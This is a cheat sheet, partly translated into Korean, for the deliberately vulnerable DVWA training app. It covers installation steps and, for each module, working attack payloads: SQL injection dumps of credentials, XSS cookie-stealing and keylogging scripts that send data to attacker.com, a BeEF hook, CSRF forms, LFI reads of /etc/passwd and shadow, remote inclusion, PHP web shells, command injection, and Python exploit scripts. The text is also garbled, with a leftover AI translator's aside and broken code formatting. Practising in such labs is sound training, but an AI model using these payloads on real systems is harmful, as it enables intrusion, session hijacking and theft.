DVWA (Damn Vulnerable Web Application) 치트 시트
```bash
Pull DVWA Docker image
docker pull vulnerables/web-dvwa
Run DVWA container
docker run —rm -it -p 80:80 vulnerables/web-dvwa
Run with persistent data
docker run -d -p 80:80 —name dvwa vulnerables/web-dvwa
Access DVWA
Navigate to http://localhost in your browser
Default credentials: admin/password
Stop container
docker stop dvwa
Remove container
docker rm dvwa
Run with custom port
docker run -d -p 8080:80 —name dvwa vulnerables/web-dvwa
Damn Vulnerable Web Application (DVWA)는 보안 전문가, 학생, 그리고 엔터프라이즈들이 법적이고 통제된 환경에서 웹 애플리케이션 보안 테스트를 연습할 수 있도록 의도적으로 취약하게 설계된 웹 애플리케이션입니다. Ryan Dewhurst에 의해 개발되고 DVWA 팀에 의해 유지보수되는 이 PHP/MySQL 웹 애플리케이션은 웹 애플리케이션에서 흔히 발견되는 실제 보안 결함을 반영하는 수많은 의도적인 취약점을 포함하고 있습니다. DVWA는 사용자가 웹 애플리케이션 취약점이 어떻게 작동하는지, 어떻게 악용될 수 있는지, 그리고 무엇보다 어떻게 방지할 수 있는지 이해할 수 있게 해주는 교육 플랫폼입니다.
애플리케이션은 OWASP Top 10 취약점을 중심으로 구성되어 있으며, 웹 애플리케이션 보안 문제의 광범위한 영역을 다루는 추가 보안 챌린지를 포함하고 있습니다. DVWA의 각 취약점은 여러 난이도 수준 - 낮음, 중간, 높음 - 으로 구현되어 있어 사용자가 점진적으로 기술과 이해도를 발전시킬 수 있습니다. 낮은 수준은 일반적으로 최소한의 또는 전혀 없는 보안 제어를 가지고 있고, 중간 수준은 우회할 수 있는 기본적인 보호 장치를 구현하며, 높은 수준은 악용하기 위해 고급 기술이 필요한 더 강력한 보안 조치를 포함합니다.
DVWA의 교육적 가치는 단순한 취약점 악용을 넘어섭니다. 애플리케이션은 소스 코드 보기 기능을 포함하여 사용자가 취약한 코드를 검사하고 보안 문제의 근본 원인을 이해할 수 있게 합니다. 이 기능은 취약하고 안전한 구현 사례를 통해 안전한 코딩 방법을 배우고 싶어하는 개발자에게 특히 가치 있습니다. 또한 애플리케이션은 각 취약점에 대한 힌트와 가이드를 제공하여 초보자에게 접근 가능하면서도 숙련된 실무자에게는 도전적입니다.
이 플랫폼은 개인 자기 학습부터 교실 수업 및 보안 교육 프로그램까지 다양한 학습 접근 방식을 지원합니다. 모듈식 설계를 통해 강사는 특정 취약점 유형에 집중하거나 포괄적인 보안 평가 연습을 만들 수 있습니다. DVWA는 전 세계 대학, 교육 기관, 보안 전문가들이 실무적인 웹 애플리케이션 보안 기술을 개발하는 데 사용하는 표준 도구가 되었습니다.
(I'll continue with the remaining sections in the same manner if you'd like the full translation.)
Would you like me to proceed with translating the remaining sections?```yaml
# Create docker-compose.yml
cat << 'EOF' > docker-compose.yml
version: '3.8'
services:
dvwa:
image: vulnerables/web-dvwa
container_name: dvwa
ports:
- "80:80"
environment:
- MYSQL_ROOT_PASSWORD=dvwa
- MYSQL_DATABASE=dvwa
- MYSQL_USER=dvwa
- MYSQL_PASSWORD=p@ssw0rd
volumes:
- dvwa_data:/var/lib/mysql
restart: unless-stopped
volumes:
dvwa_data:
EOF
# Start DVWA
docker-compose up -d
# View logs
docker-compose logs -f
# Stop DVWA
docker-compose down
# Stop and remove volumes
docker-compose down -vManual Installation on Ubuntu/Debian
# Update system
sudo apt update && sudo apt upgrade -y
# Install LAMP stack
sudo apt install apache2 mysql-server php php-mysql php-gd libapache2-mod-php -y
# Start services
sudo systemctl start apache2
sudo systemctl start mysql
sudo systemctl enable apache2
sudo systemctl enable mysql
# Secure MySQL installation
sudo mysql_secure_installation
# Create database and user
sudo mysql -u root -p ``<< 'EOF'
CREATE DATABASE dvwa;
CREATE USER 'dvwa'@'localhost' IDENTIFIED BY 'p@ssw0rd';
GRANT ALL PRIVILEGES ON dvwa.* TO 'dvwa'@'localhost';
FLUSH PRIVILEGES;
EXIT;
EOF
# Download DVWA
cd /var/www/html
sudo git clone https://github.com/digininja/DVWA.git dvwa
# Set permissions
sudo chown -R www-data:www-data /var/www/html/dvwa
sudo chmod -R 755 /var/www/html/dvwa
# Configure DVWA
sudo cp /var/www/html/dvwa/config/config.inc.php.dist /var/www/html/dvwa/config/config.inc.php
# Edit configuration
sudo nano /var/www/html/dvwa/config/config.inc.php
# Update database settings:
# $_DVWA['db_user'] = 'dvwa';
# $_DVWA['db_password'] = 'p@ssw0rd';
# $_DVWA['db_database'] = 'dvwa';
# Configure PHP
sudo nano /etc/php/*/apache2/php.ini
# Set: allow_url_include = On
# Set: allow_url_fopen = On
# Restart Apache
sudo systemctl restart apache2
# Access DVWA at http://localhost/dvwaInstallation on CentOS/RHEL
# Install EPEL repository
sudo yum install epel-release -y
# Install LAMP stack
sudo yum install httpd mariadb-server php php-mysql php-gd -y
# Start services
sudo systemctl start httpd
sudo systemctl start mariadb
sudo systemctl enable httpd
sudo systemctl enable mariadb
# Secure MariaDB
sudo mysql_secure_installation
# Create database
sudo mysql -u root -p << 'EOF'
CREATE DATABASE dvwa;
CREATE USER 'dvwa'@'localhost' IDENTIFIED BY 'p@ssw0rd';
GRANT ALL PRIVILEGES ON dvwa.* TO 'dvwa'@'localhost';
FLUSH PRIVILEGES;
EXIT;
EOF
# Download and configure DVWA
cd /var/www/html
sudo git clone https://github.com/digininja/DVWA.git dvwa
sudo chown -R apache:apache /var/www/html/dvwa
sudo cp /var/www/html/dvwa/config/config.inc.php.dist /var/www/html/dvwa/config/config.inc.php
# Configure SELinux (if enabled)
sudo setsebool -P httpd_can_network_connect 1
sudo setsebool -P httpd_unified 1
# Configure firewall
sudo firewall-cmd --permanent --add-service=http
sudo firewall-cmd --reload
# Restart Apache
sudo systemctl restart httpdWindows Installation (XAMPP)
# Download and install XAMPP
# https://www.apachefriends.org/download.html
# Start XAMPP Control Panel
# Start Apache and MySQL services
# Download DVWA
# Extract to C:\xampp\htdocs\dvwa
# Configure database
# Open phpMyAdmin (http://localhost/phpmyadmin)
# Create database 'dvwa'
# Create user 'dvwa' with password 'p@ssw0rd'
# Configure DVWA
# Copy config.inc.php.dist to config.inc.php
# Edit database settings in config.inc.php
# Access DVWA at http://localhost/dvwaInitial Setup and Configuration
First-Time Setup
# Access DVWA setup page
# Navigate to http://localhost/dvwa/setup.php
# Check system requirements
# Ensure all requirements are met (green checkmarks)
# Create/Reset Database
# Click "Create / Reset Database" button
# Login to DVWA
# Navigate to http://localhost/dvwa/login.php
# Username: admin
# Password: password
# Change default password (recommended)
# Go to DVWA Security ->`` Change PasswordSecurity Level Configuration
# Set security level
# Navigate to DVWA Security
# Low Security Level
# - Minimal security controls
# - Basic vulnerabilities easily exploitable
# - Ideal for beginners
# Medium Security Level
# - Some security controls implemented
# - Requires intermediate techniques
# - Good for skill development
# High Security Level
# - Robust security measures
# - Advanced exploitation techniques required
# - Challenging for experienced users
# Impossible Security Level
# - Secure implementation
# - Shows how vulnerabilities should be fixed
# - Educational reference for developersUser Management
# Default users in DVWA:
# admin:password (Administrator)
# gordonb:abc123 (User)
# 1337:charley (User)
# pablo:letmein (User)
# smithy:password (User)
# Add new users (via database)
mysql -u dvwa -p dvwa << 'EOF'
INSERT INTO users (user_id, first_name, last_name, user, password, avatar, last_login, failed_login)
VALUES (6, 'Test', 'User', 'testuser', '5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8', 'http://localhost/dvwa/hackable/users/testuser.jpg', '0000-00-00 00:00:00', 0);
EOF
# Password hash for 'password': 5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8Vulnerability Modules
SQL Injection
# Low Security Level
# Basic SQL injection
' OR '1'='1
' OR 1=1 --
' OR 1=1 #
# Extract database information
' UNION SELECT null, version() #
' UNION SELECT null, database() #
' UNION SELECT null, user() #
# Extract table names
' UNION SELECT null, table_name FROM information_schema.tables WHERE table_schema=database() #
# Extract column names
' UNION SELECT null, column_name FROM information_schema.columns WHERE table_name='users' #
# Extract user data
' UNION SELECT user, password FROM users #
# Medium Security Level
# Bypass basic filtering
1' OR '1'='1
1' OR 1=1 --
1' UNION SELECT null, version() --
# High Security Level
# Use advanced techniques
1' OR '1'='1' LIMIT 1 --
1' UNION SELECT null, CONCAT(user,':',password) FROM users LIMIT 1 --SQL Injection (Blind)
# Boolean-based blind SQL injection
# Low Security Level
1' AND 1=1 # (True condition)
1' AND 1=2 # (False condition)
# Extract database name length
1' AND LENGTH(database())=4 #
# Extract database name character by character
1' AND SUBSTRING(database(),1,1)='d' #
1' AND SUBSTRING(database(),2,1)='v' #
1' AND SUBSTRING(database(),3,1)='w' #
1' AND SUBSTRING(database(),4,1)='a' #
# Time-based blind SQL injection
1' AND SLEEP(5) #
1' AND IF(LENGTH(database())=4,SLEEP(5),0) #
# Extract user count
1' AND (SELECT COUNT(*) FROM users)=5 #
# Extract admin password length
1' AND LENGTH((SELECT password FROM users WHERE user='admin'))=32 #Cross-Site Scripting (XSS)
# Reflected XSS
# Low Security Level
<script>alert('XSS')</script>
<script>alert(document.cookie)</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
# Medium Security Level
# Bypass basic filtering
<Script>alert('XSS')</Script>
<SCRIPT>alert('XSS')</SCRIPT>
<img src=x onerror="alert('XSS')">
<svg/onload=alert('XSS')>
# High Security Level
# Advanced bypass techniques
<img src=x onerror=alert(String.fromCharCode(88,83,83))>
<svg><script>alert('XSS')</script></svg>
# Cookie stealing payload
<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script>
# Keylogger payload
<script>
document.onkeypress = function(e) \\\\{
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://attacker.com/log.php?key=' + String.fromCharCode(e.which), true);
xhr.send();
\\\\}
</script>Cross-Site Scripting (Stored)
# Stored XSS in message/comment fields
# Low Security Level
<script>alert('Stored XSS')</script>
<img src=x onerror=alert('Stored XSS')>
# Persistent cookie stealing
<script>
var img = new Image();
img.src = 'http://attacker.com/steal.php?cookie=' + document.cookie;
</script>
# Admin session hijacking
<script>
if(document.cookie.indexOf('admin') !== -1) \\\\{
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://attacker.com/admin.php?session=' + document.cookie, true);
xhr.send();
\\\\}
</script>
# BeEF hook
<script src="http://attacker.com:3000/hook.js"></script>
# Medium/High Security Level
# Use encoding and obfuscation
<img src=x onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))">Cross-Site Request Forgery (CSRF)
<form action="http://localhost/dvwa/vulnerabilities/csrf/" method="GET">
<input type="hidden" name="password_new" value="hacked123">
<input type="hidden" name="password_conf" value="hacked123">
<input type="hidden" name="Change" value="Change">
<input type="submit" value="Click me!">
</form>
<form id="csrf" action="http://localhost/dvwa/vulnerabilities/csrf/" method="GET">
<input type="hidden" name="password_new" value="hacked123">
<input type="hidden" name="password_conf" value="hacked123">
<input type="hidden" name="Change" value="Change">
</form>
<script>document.getElementById('csrf').submit();</script>
<img src="http://localhost/dvwa/vulnerabilities/csrf/?password_new=hacked123&password_conf=hacked123&Change=Change">
<iframe src="data:text/html,<form action='http://localhost/dvwa/vulnerabilities/csrf/' method='GET'><input name='password_new' value='hacked123'><input name='password_conf' value='hacked123'><input name='Change' value='Change'></form><script>document.forms[0].submit()</script>"></iframe>File Inclusion
# Local File Inclusion (LFI)
# Low Security Level
page=../../../etc/passwd
page=../../../etc/shadow
page=../../../var/log/apache2/access.log
page=../../../proc/version
page=../../../home/user/.bash_history
# Windows LFI
page=../../../windows/system32/drivers/etc/hosts
page=../../../windows/win.ini
page=../../../windows/system.ini
# PHP wrapper exploitation
page=php://filter/convert.base64-encode/resource=../../../etc/passwd
page=php://filter/read=string.rot13/resource=../../../etc/passwd
# Log poisoning
# First, poison the log file via User-Agent
# Then include the log file
page=../../../var/log/apache2/access.log
# Medium Security Level
# Bypass basic filtering
page=....//....//....//etc/passwd
page=..././..././..././etc/passwd
# High Security Level
# Use null byte injection (older PHP versions)
page=../../../etc/passwd%00
page=../../../etc/passwd%00.php
# Remote File Inclusion (RFI)
# If allow_url_include is enabled
page=http://attacker.com/shell.txt
page=ftp://attacker.com/shell.txtFile Upload
# Low Security Level
# Upload PHP shell directly
<?php system($_GET['cmd']); ?>
# Save as shell.php and upload
# Medium Security Level
# Bypass MIME type filtering
# Change Content-Type to image/jpeg
# Or use double extension: shell.php.jpg
# Bypass file extension filtering
shell.php
shell.php5
shell.phtml
shell.phar
# High Security Level
# Embed PHP in image
# Create valid image with embedded PHP
exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg
# Rename to image.php
# GIF header bypass
GIF89a
<?php system($_GET['cmd']); ?>
# PNG bypass with PHP
# Create PNG with PHP payload in metadataCommand Injection
# Low Security Level
# Basic command injection
127.0.0.1; ls
127.0.0.1 && whoami
127.0.0.1|cat /etc/passwd
127.0.0.1 & id
# Windows command injection
127.0.0.1 & dir
127.0.0.1 && type C:\windows\win.ini
127.0.0.1|net user
# Medium Security Level
# Bypass basic filtering
127.0.0.1;ls
127.0.0.1&&whoami
127.0.0.1|cat$\\\\{IFS\\\\}/etc/passwd
# High Security Level
# Advanced bypass techniques
127.0.0.1|cat</etc/passwd
127.0.0.1|cat<>/etc/passwd
127.0.0.1|\\\\{cat,/etc/passwd\\\\}Weak Session IDs
# Analyze session ID patterns
# Low Security Level
# Session IDs increment sequentially
# Predict next session ID
# Medium Security Level
# Session IDs based on timestamp
# Calculate based on time
# High Security Level
# Session IDs use MD5 of timestamp
# Still predictable with time knowledge
# Session hijacking techniques
# Capture session cookies
# Use browser developer tools
# Intercept with Burp Suite
# Session fixation attacksInsecure CAPTCHA
# Low Security Level
# CAPTCHA validation bypass
# Remove step parameter
# Modify passed parameter
# Medium Security Level
# Bypass CAPTCHA validation
# Reuse passed parameter
# Manipulate form data
# High Security Level
# Advanced CAPTCHA bypass
# Analyze CAPTCHA generation
# Exploit implementation flaws
# Automated bypass techniques
# Use OCR tools
# Machine learning approaches
# Pattern recognitionTesting Methodologies
Manual Testing Approach
# 1. Reconnaissance
# - Examine source code
# - Identify input fields
# - Analyze client-side validation
# - Check for hidden parameters
# 2. Input Validation Testing
# - Test all input fields
# - Try various payloads
# - Check for filtering mechanisms
# - Test boundary conditions
# 3. Authentication Testing
# - Test login mechanisms
# - Check session management
# - Test password policies
# - Verify logout functionality
# 4. Authorization Testing
# - Test access controls
# - Check privilege escalation
# - Verify user roles
# - Test direct object references
# 5. Session Management Testing
# - Analyze session tokens
# - Test session fixation
# - Check session timeout
# - Verify secure flags
```### 자동화된 테스트 도구
```bash
# SQLmap for SQL injection
sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=your_session_id; security=low" --dbs
# Nikto web scanner
nikto -h http://localhost/dvwa/
# OWASP ZAP
# Configure proxy settings
# Spider the application
# Run active scan
# Burp Suite
# Configure browser proxy
# Intercept requests
# Use scanner and intruder
# w3af web application scanner
w3af_console
target http://localhost/dvwa/
plugins
audit sql_injection,xss,csrf
crawl web_spider
start
```### 맞춤형 테스트 스크립트
```python
#!/usr/bin/env python3
# DVWA SQL injection tester
import requests
import sys
def test_sql_injection(base_url, session_cookie):
payloads = [
"' OR '1'='1",
"' OR 1=1 --",
"' OR 1=1 #",
"' UNION SELECT null, version() #",
"' UNION SELECT user, password FROM users #"
]
headers = \\\\{
'Cookie': f'PHPSESSID=\\\\{session_cookie\\\\}; security=low'
\\\\}
for payload in payloads:
url = f"\\\\{base_url\\\\}/vulnerabilities/sqli/?id=\\\\{payload\\\\}&Submit=Submit"
try:
response = requests.get(url, headers=headers)
if 'admin' in response.text or 'root' in response.text:
print(f"[+] Successful payload: \\\\{payload\\\\}")
print(f"[+] Response contains sensitive data")
else:
print(f"[-] Failed payload: \\\\{payload\\\\}")
except Exception as e:
print(f"[!] Error with payload \\\\{payload\\\\}: \\\\{e\\\\}")
if __name__ == "__main__":
if len(sys.argv) != 3:
print("Usage: python3 dvwa_sqli_test.py <base_url> <session_cookie>")
sys.exit(1)
base_url = sys.argv[1]
session_cookie = sys.argv[2]
test_sql_injection(base_url, session_cookie)
```## 교육용 연습
### 초급 연습
```bash
# Exercise 1: Basic SQL Injection
# Objective: Extract all usernames and passwords
# Steps:
# 1. Set security level to Low
# 2. Navigate to SQL Injection module
# 3. Try basic payloads
# 4. Extract database information
# 5. Dump user credentials
# Exercise 2: Reflected XSS
# Objective: Execute JavaScript in victim's browser
# Steps:
# 1. Find XSS vulnerable parameter
# 2. Craft XSS payload
# 3. Test different bypass techniques
# 4. Create cookie stealing payload
# Exercise 3: File Upload Bypass
# Objective: Upload and execute PHP shell
# Steps:
# 1. Create PHP shell
# 2. Try direct upload
# 3. Bypass file type restrictions
# 4. Execute commands through shell
```### 중급 연습
```bash
# Exercise 4: Blind SQL Injection
# Objective: Extract data without direct output
# Steps:
# 1. Identify blind injection point
# 2. Use boolean-based techniques
# 3. Extract database name
# 4. Extract user passwords
# 5. Automate extraction process
# Exercise 5: CSRF Attack Chain
# Objective: Change admin password via CSRF
# Steps:
# 1. Analyze password change functionality
# 2. Create CSRF proof of concept
# 3. Test different delivery methods
# 4. Bypass CSRF protections
# Exercise 6: LFI to RCE
# Objective: Achieve code execution via LFI
# Steps:
# 1. Find LFI vulnerability
# 2. Test file inclusion
# 3. Poison log files
# 4. Achieve remote code execution
```### 고급 연습
```bash
# Exercise 7: Multi-Stage Attack
# Objective: Combine multiple vulnerabilities
# Steps:
# 1. Use XSS to steal admin session
# 2. Use CSRF to change admin password
# 3. Login as admin
# 4. Upload shell via file upload
# 5. Achieve system access
# Exercise 8: Session Prediction
# Objective: Predict and hijack sessions
# Steps:
# 1. Analyze session ID generation
# 2. Identify patterns
# 3. Predict valid session IDs
# 4. Hijack user sessions
# Exercise 9: Complete Compromise
# Objective: Full application takeover
# Steps:
# 1. Enumerate all vulnerabilities
# 2. Chain exploits together
# 3. Escalate privileges
# 4. Maintain persistence
# 5. Document attack path
```## 보안 도구와의 통합
### Burp Suite 통합
```bash
# Configure Burp Suite proxy
# Browser settings: 127.0.0.1:8080
# Burp Suite testing workflow
# 1. Spider DVWA application
# 2. Review site map
# 3. Send requests to Repeater
# 4. Test with Intruder
# 5. Run active scanner
# Custom Burp extensions for DVWA
# - DVWA Security Level Changer
# - Automated payload generator
# - Custom session handling
```### OWASP ZAP 통합
```bash
# ZAP automated scan
zap-baseline.py -t http://localhost/dvwa/
# ZAP full scan
zap-full-scan.py -t http://localhost/dvwa/
# ZAP API usage
# Start ZAP daemon
zap.sh -daemon -port 8080
# Spider application
curl "http://localhost:8080/JSON/spider/action/scan/?url=http://localhost/dvwa/"
# Active scan
curl "http://localhost:8080/JSON/ascan/action/scan/?url=http://localhost/dvwa/"
# Generate report
curl "http://localhost:8080/OTHER/core/other/htmlreport/" > dvwa_report.html
```### 맞춤형 보안 스캐너
```python
#!/usr/bin/env python3
# DVWA comprehensive scanner
import requests
import re
import time
from urllib.parse import urljoin
class DVWAScanner:
def __init__(self, base_url, session_cookie):
self.base_url = base_url
self.session = requests.Session()
self.session.cookies.set('PHPSESSID', session_cookie)
self.session.cookies.set('security', 'low')
def test_sql_injection(self):
print("[*] Testing SQL Injection...")
url = urljoin(self.base_url, '/vulnerabilities/sqli/')
payloads = [
"' OR '1'='1",
"' UNION SELECT user, password FROM users #"
]
for payload in payloads:
params = \\\\{'id': payload, 'Submit': 'Submit'\\\\}
response = self.session.get(url, params=params)
if 'admin' in response.text:
print(f"[+] SQL Injection successful: \\\\{payload\\\\}")
return True
print("[-] SQL Injection not found")
return False
def test_xss(self):
print("[*] Testing XSS...")
url = urljoin(self.base_url, '/vulnerabilities/xss_r/')
payloads = [
"<script>alert('XSS')</script>",
"<img src=x onerror=alert('XSS')>"
]
for payload in payloads:
params = \\\\{'name': payload\\\\}
response = self.session.get(url, params=params)
if payload in response.text:
print(f"[+] XSS successful: \\\\{payload\\\\}")
return True
print("[-] XSS not found")
return False
def test_file_inclusion(self):
print("[*] Testing File Inclusion...")
url = urljoin(self.base_url, '/vulnerabilities/fi/')
payloads = [
"../../../etc/passwd",
"php://filter/convert.base64-encode/resource=../../../etc/passwd"
]
for payload in payloads:
params = \\\\{'page': payload\\\\}
response = self.session.get(url, params=params)
if 'root:' in response.text or 'cm9vdDo' in response.text:
print(f"[+] File Inclusion successful: \\\\{payload\\\\}")
return True
print("[-] File Inclusion not found")
return False
def run_scan(self):
print(f"[*] Starting DVWA scan on \\\\{self.base_url\\\\}")
results = \\\\{
'sql_injection': self.test_sql_injection(),
'xss': self.test_xss(),
'file_inclusion': self.test_file_inclusion()
\\\\}
print("\n[*] Scan Results:")
for vuln, found in results.items():
status = "VULNERABLE" if found else "NOT FOUND"
print(f" \\\\{vuln\\\\}: \\\\{status\\\\}")
return results
if __name__ == "__main__":
scanner = DVWAScanner("http://localhost/dvwa", "your_session_id")
scanner.run_scan()
```## 학습을 위한 모범 사례
### 점진적 학습 경로
```bash
# Phase 1: Understanding Basics (Low Security)
# - Learn how vulnerabilities work
# - Practice basic exploitation
# - Understand attack vectors
# - Review source code
# Phase 2: Bypass Techniques (Medium Security)
# - Learn common protections
# - Practice bypass methods
# - Understand filtering mechanisms
# - Develop advanced payloads
# Phase 3: Advanced Exploitation (High Security)
# - Master complex techniques
# - Chain multiple vulnerabilities
# - Develop custom exploits
# - Understand defense mechanisms
# Phase 4: Secure Development (Impossible Security)
# - Study secure implementations
# - Learn defensive coding
# - Understand security controls
# - Apply lessons to real applications
```### 문서화 및 보고
```bash
# Create learning journal
mkdir ~/dvwa_learning
cd ~/dvwa_learning
# Document each vulnerability
cat << 'EOF' > sql_injection_notes.md
# SQL Injection Learning Notes
## Low Security Level
- Vulnerability: Direct SQL injection in id parameter
- Payload: ' OR '1'='1
- Result: Bypassed authentication
- Root Cause: No input validation
## Medium Security Level
- Protection: Basic filtering of quotes
- Bypass: Using numeric injection
- Payload: 1 OR 1=1
- Lesson: Client-side filtering insufficient
## High Security Level
- Protection: Prepared statements
- Result: Injection prevented
- Lesson: Proper parameterization prevents SQLi
EOF
# Create exploit database
cat << 'EOF' > exploits.txt
# DVWA Exploit Database
## SQL Injection
' OR '1'='1
' UNION SELECT user, password FROM users #
## XSS
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
## File Inclusion
../../../etc/passwd
php://filter/convert.base64-encode/resource=../../../etc/passwd
EOF
```### 안전한 테스트 환경
```bash
# Isolated network setup
# Use VirtualBox/VMware
# Create isolated network segment
# No internet access for vulnerable systems
# Backup and restore
# Create VM snapshots before testing
# Document system state
# Reset between exercises
# Monitoring and logging
# Enable web server logs
# Monitor system activity
# Document all actions
# Review logs for learning
```---
**⚠️ 보안 공지**: DVWA(Damn Vulnerable Web Application)는 의도적으로 취약하므로 교육 목적으로만 격리되고 통제된 환경에서 사용해야 합니다. DVWA를 인터넷에 접근 가능한 프로덕션 네트워크나 시스템에 배포하지 마십시오. 이 애플리케이션에는 심각한 보안 취약점이 포함되어 있어 노출 시 시스템 보안을 위협할 수 있습니다. 항상 가상 머신이나 격리된 랩 환경에서 DVWA를 사용하십시오. 이 도구는 웹 애플리케이션 보안을 학습하기 위해 설계되었으며 보안 전문가, 학생, 연구자들이 책임감 있게 사용해야 합니다.
**📚 추가 리소스**:
- [DVWA 공식 GitHub 저장소](https://github.com/digininja/DVWA)
- [DVWA 문서](https://dvwa.co.uk/)
- [OWASP Top 10](https://owasp.org/www-project-top-ten/)
- [웹 애플리케이션 보안 테스트 가이드](https://owasp.org/www-project-web-security-testing-guide/)